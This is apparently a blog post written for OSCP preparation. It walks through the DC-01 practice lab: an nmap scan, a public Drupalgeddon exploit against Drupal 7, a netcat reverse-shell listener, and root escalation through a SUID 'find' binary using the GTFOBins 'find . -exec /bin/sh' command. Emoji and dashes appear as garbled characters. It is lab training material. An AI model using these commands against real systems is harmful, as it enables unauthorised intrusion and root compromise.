Preparing for OSCP | Sharing Practical Labs & Real-World Attack Analysis

DC-01 Machine โ€” Drupal Exploitation to SUID Privilege Escalation

Today's lab focused on exploiting a vulnerable Drupal 7 instance and escalating privileges using SUID misconfiguration.

This machine reinforced the importance of:

  • Service enumeration
  • Exploit verification
  • Reverse shell handling
  • SUID-based privilege escalation

๐Ÿ”Ž Step 1: Initial Enumeration

Started with a full aggressive scan:

nmap -sCV -A โ€” min-rate 1000 192.168.xx.xx

Explanation:

  • -sC โ†’ Default Nmap scripts
  • -sV โ†’ Service version detection
  • -A โ†’ OS detection + traceroute
  • โ€” min-rate 1000 โ†’ Faster scanning
None

Findings:

โœ” Port 80 open โœ” Drupal CMS running

None

๐ŸŒ Step 2: Identifying Drupal Version

Accessed web application in browser.

Observed that the site was running Drupal 7.

Searched for known exploits:

searchsploit drupal 7

Identified a public exploit for Drupal 7 (Drupalgeddon vulnerability).

None

๐Ÿ’ฅ Step 3: Exploit Verification

Downloaded exploit:

searchsploit -m <exploit_id>

Modified target IP in exploit script and executed it.

The exploit successfully confirmed remote code execution.

Verify the exploit

None

๐Ÿš Step 4: Reverse Shell Access

Injected reverse shell payload into exploit.

Triggered exploit โ†’ Reverse shell received successfully.

None

On attacker machine:

nc -lnvp 1234

None

Upgraded shell:

python3 -c 'import pty; pty.spawn("/bin/bash")'

๐Ÿ” Step 5: Privilege Escalation โ€” SUID Enumeration

Enumerated SUID binaries:

find / -perm -u=s -type f 2>/dev/null

Explanation:

  • -perm -u=s โ†’ Find SUID files
  • -type f โ†’ Regular files only
  • 2>/dev/null โ†’ Suppress errors
None

Discovered unusual SUID permission on:

/usr/bin/find

๐Ÿšจ Step 6: Exploiting SUID find (GTFOBins Method)

Checked GTFOBins for find.

Used the following command:

find . -exec /bin/sh \; -quit

None

Used the following command:

find . -exec /bin/sh \; -quit

Why This Works:

If find has SUID bit set, it executes /bin/sh with elevated privileges.

None

๐Ÿ‘‘ Result

โœ” Web exploitation via Drupal โœ” Reverse shell obtained โœ” SUID misconfiguration identified โœ” Root shell successfully gained

๐ŸŽฅ Full Practical Demonstration For a complete step-by-step video walkthrough, watch here: